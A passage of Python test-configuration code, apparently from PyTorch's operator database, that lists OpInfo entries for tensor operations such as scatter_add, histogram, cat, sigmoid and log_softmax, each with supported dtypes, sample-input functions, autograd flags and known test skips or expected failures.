DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'))), OpInfo('scatter_add', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_add, error_inputs_func=error_inputs_scatter_and_scatter_add, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_stack, assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/77046 DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), ), ), OpInfo('hstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), BinaryUfuncInfo('hypot', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False), OpInfo('histogram', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogram is only implemented on CPU sample_inputs_func=sample_inputs_histogram, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.histogram(i0, 1, weight=tensor(-0.5735, dtype=torch.float32), density=False) # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Not Implemented on XLA. DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla'), )), OpInfo('histogramdd', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogramdd is only implemented on CPU sample_inputs_func=sample_inputs_histogramdd, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('histc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), sample_inputs_func=sample_inputs_histc, supports_out=True, supports_autograd=False, skips=( # CUDA histc returns a float tensor but does not correctly warn when passed an integral out tensor # "AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast # from a result of dtype torch.float32 into an out= with dtype torch.long" DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('bincount', dtypes=integral_types_and(), sample_inputs_func=sample_inputs_bincount, supports_out=False, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('bucketize', dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_bucketize, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('searchsorted', dtypes=all_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_searchsorted, supports_autograd=False, ref=reference_searchsorted, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('cat', ref=_cat_np, aliases=('concat',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.complex32), sample_inputs_func=sample_inputs_cat_concat, reference_inputs_func=reference_inputs_cat, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, skips=( # RuntimeError: Arguments for call not valid. # Expected a value of type 'List[Tensor]' for argument # 'tensors' but instead found type 'Tensor (inferred)'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'),)), OpInfo('vstack', aliases=('row_stack',), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: _fn() Expected a value of type # 'Tensor (inferred)' for argument 't0' but instead found type 'tuple'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'),)), OpInfo('dstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('unfold', op=lambda x, *args: x.unfold(*args), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), sample_inputs_func=sample_inputs_unfold), OpInfo('msort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_msort), OpInfo('movedim', aliases=('moveaxis',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_movedim_moveaxis), OpInfo('renorm', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_renorm, error_inputs_func=error_inputs_renorm), ShapeFuncInfo('repeat', op=lambda x, dims: x.repeat(dims), ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('squeeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_squeeze), UnaryUfuncInfo( 'fill', op=_fill_aten, ref=_fill_np, method_variant=None, inplace_variant=torch.Tensor.fill_, sample_kwargs=_fill_sample_kwargs, sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'value': True}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, skips=( # JIT has issue when op is passed as lambda # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("No fill_ op"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("No fill_ op"), 'TestNNCOpInfo'), )), OpInfo('resize_', op=lambda x, shape: x.clone().resize_(shape), method_variant=None, inplace_variant=torch.Tensor.resize_, # the test fails because resize_ doesn't work with imag views as expected by the test # https://github.com/pytorch/pytorch/issues/65945 test_neg_view=False, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('resize_as_', op=lambda x, other: torch.resize_as_(x.clone(), other), method_variant=None, inplace_variant=torch.Tensor.resize_as_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('take_along_dim', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take_along_dim, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), ShapeFuncInfo('tile', ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile), OpInfo('trapz', # TODO: in the future, 'trapz' should be made a proper alias of 'trapezoid' dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('trapezoid', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('cumulative_trapezoid', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_cumulative_trapezoid,), OpInfo('unsqueeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, assert_jit_shape_analysis=True, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused sample_inputs_func=sample_unsqueeze), BinaryUfuncInfo('xlogy', aliases=('special.xlogy',), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs nan comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), OpInfo('zero_', op=lambda x: torch.zero_(x.clone()), method_variant=None, inplace_variant=torch.Tensor.zero_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_gradgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_zero_), BinaryUfuncInfo('special.xlog1py', aten_name='special_xlog1py', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=all_types_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs 0 comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), BinaryUfuncInfo('special.zeta', aten_name='special_zeta', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, supports_autograd=False, supports_one_python_scalar=True), # TODO: FIXME # OpInfo entry to verify the gradient formula of `other`/`q` # BinaryUfuncInfo('special.zeta', # op=lambda q, x, **kwargs: torch.special.zeta(x, q, **kwargs), # aten_name='special_zeta', # variant_test_name='grad', # dtypes=all_types_and(torch.bool), # promotes_int_to_float=True, # supports_autograd=True, # supports_rhs_python_scalar=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable") # ], # skips=( # # Lambda doesn't work in JIT test # # AssertionError: JIT Test does not execute any logic # DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit"), # )), OpInfo('logsumexp', aliases=('special.logsumexp',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_logsumexp), OpInfo('trace', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_trace), OpInfo('transpose', ref=_numpy_ref_transpose, aliases=('swapdims', 'swapaxes'), assert_jit_shape_analysis=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_transpose_swapdims), OpInfo('T', op=lambda x: x.T, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('H', op=lambda x: x.H, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('mT', op=lambda x: x.mT, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('mH', op=lambda x: x.mH, aliases=('adjoint',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('tril', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('triu', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('kron', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kron), OpInfo('inner', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_inner, ), OpInfo('tensordot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tensordot, skips=( # Skip operator schema test because this is a functional and not an operator. # Reference: https://github.com/pytorch/pytorch/issues/54574 DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ) ), OpInfo('to_sparse', op=lambda x, *args: x.to_sparse(*args), sample_inputs_func=sample_inputs_to_sparse, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), backward_dtypes=floating_types(), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_sparse_csr=True, check_batched_grad=False, check_batched_gradgrad=False, skips=( # to_sparse does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_nondifferentiable', dtypes=(torch.cdouble,)), # NotImplementedError: Could not run 'aten::normal_' with arguments from the 'SparseCPU' backend DecorateInfo(unittest.skip(""), 'TestCommon', 'test_noncontiguous_samples'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Allowed exception: sparse tensors don't have strides DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_backward'), # TODO: implement csr.to_sparse(sample_dim) where sampled_dim is 1. DecorateInfo(unittest.skip("csr.to_sparse(1) not implemented. Skipped!"), 'TestSparseCSR', 'test_sparse_csr_consistency'), ) ), OpInfo('logcumsumexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16), skips=( # AssertionError: UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cuda'), ), sample_inputs_func=sample_inputs_logcumsumexp, error_inputs_func=error_inputs_logcumsumexp), UnaryUfuncInfo('sigmoid', aliases=('special.expit', 'nn.functional.sigmoid'), aten_backward_name='sigmoid_backward', ref=reference_sigmoid if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 1e-2, torch.complex64: 1e-1, torch.bfloat16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/56012 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.complex64, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.chalf, torch.complex64, torch.cdouble]), # alias, nn.functional.sigmoid, will produce (because of warning string saved): # "RuntimeError: Expected to not find "sigmoid" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping')), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.complex32, torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, # sigmoid(z) = 1 / (1 + exp(-z)), at z = j * pi * odd_number, the denominator is zero reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 1j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), UnaryUfuncInfo('digamma', ref=scipy.special.digamma if TEST_SCIPY else _NOTHING, aliases=('special.psi', 'special.digamma',), decorators=(precisionOverride({torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.entr', ref=scipy.special.entr if TEST_SCIPY else _NOTHING, aten_name='special_entr', supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-1, torch.bfloat16: 1e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.float16]), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_entr), UnaryUfuncInfo('special.ndtri', ref=scipy.special.ndtri if TEST_SCIPY else _NOTHING, domain=(0, 1), aten_name='special_ndtri', dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.log_ndtr', aten_name='special_log_ndtr', ref=scipy.special.log_ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('erf', ref=scipy.special.erf if TEST_SCIPY else _NOTHING, aliases=('special.erf', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfc', ref=scipy.special.erfc if TEST_SCIPY else _NOTHING, aliases=('special.erfc', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfinv', ref=scipy.special.erfinv if TEST_SCIPY else _NOTHING, aliases=('special.erfinv', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2, torch.float32: 1e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, domain=(-1, 1), skips=( # Reference: https://github.com/pytorch/pytorch/pull/49155#issuecomment-742664611 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), )), OpInfo("nn.functional.smooth_l1_loss", ref=reference_smooth_l1_loss, sample_inputs_func=sample_inputs_smooth_l1_loss, dtypes=floating_types_and(torch.float16, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),)), OpInfo( "nn.functional.l1_loss", ref=loss_reference_reduction_wrapper(lambda input, target: np.abs(input - target)), aten_backward_name='l1_loss_backward', sample_inputs_func=sample_inputs_l1_loss, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), backward_dtypes=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), UnaryUfuncInfo('lgamma', ref=reference_lgamma if TEST_SCIPY else _NOTHING, aliases=('special.gammaln', ), decorators=(precisionOverride({torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/50140#discussion_r552615345 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), # Reference: https://github.com/pytorch/pytorch/pull/50140#issuecomment-756150214 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), ), # lgamma have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo( 'logdet', dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_logdet, decorators=(skipCPUIfNoLapack, skipCUDAIfNoMagma)), # `log_softmax` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. OpInfo( 'log_softmax', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, aten_backward_name='_log_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, supports_forward_ad=True, assert_autodiffed=True), OpInfo( 'log_softmax', variant_test_name='dtype', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), supports_forward_ad=True, assert_autodiffed=True), UnaryUfuncInfo('logit', aten_backward_name='logit_backward', ref=scipy.special.logit if TEST_SCIPY else _NOTHING, domain=(0, 1), aliases=('special.logit', ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_logit), OpInfo('where', # Currently only the `input` is tested in gradcheck. # If we pass `condition` first, none of the input which supports # autograd will be tested. Hence the following lambda. op=lambda self, condition, other: torch.where(condition, self, other), ref=lambda self, condition, other: np.where(condition, self, other), sample_inputs_func=sample_inputs_where, reference_inputs_func=reference_inputs_where, error_inputs_func=error_inputs_where, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo(onlyCUDA, "TestCommon", 'test_errors'),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf)), OpInfo('nonzero', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_nonzero, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # nonzero(): argument 'out' must be Tensor, 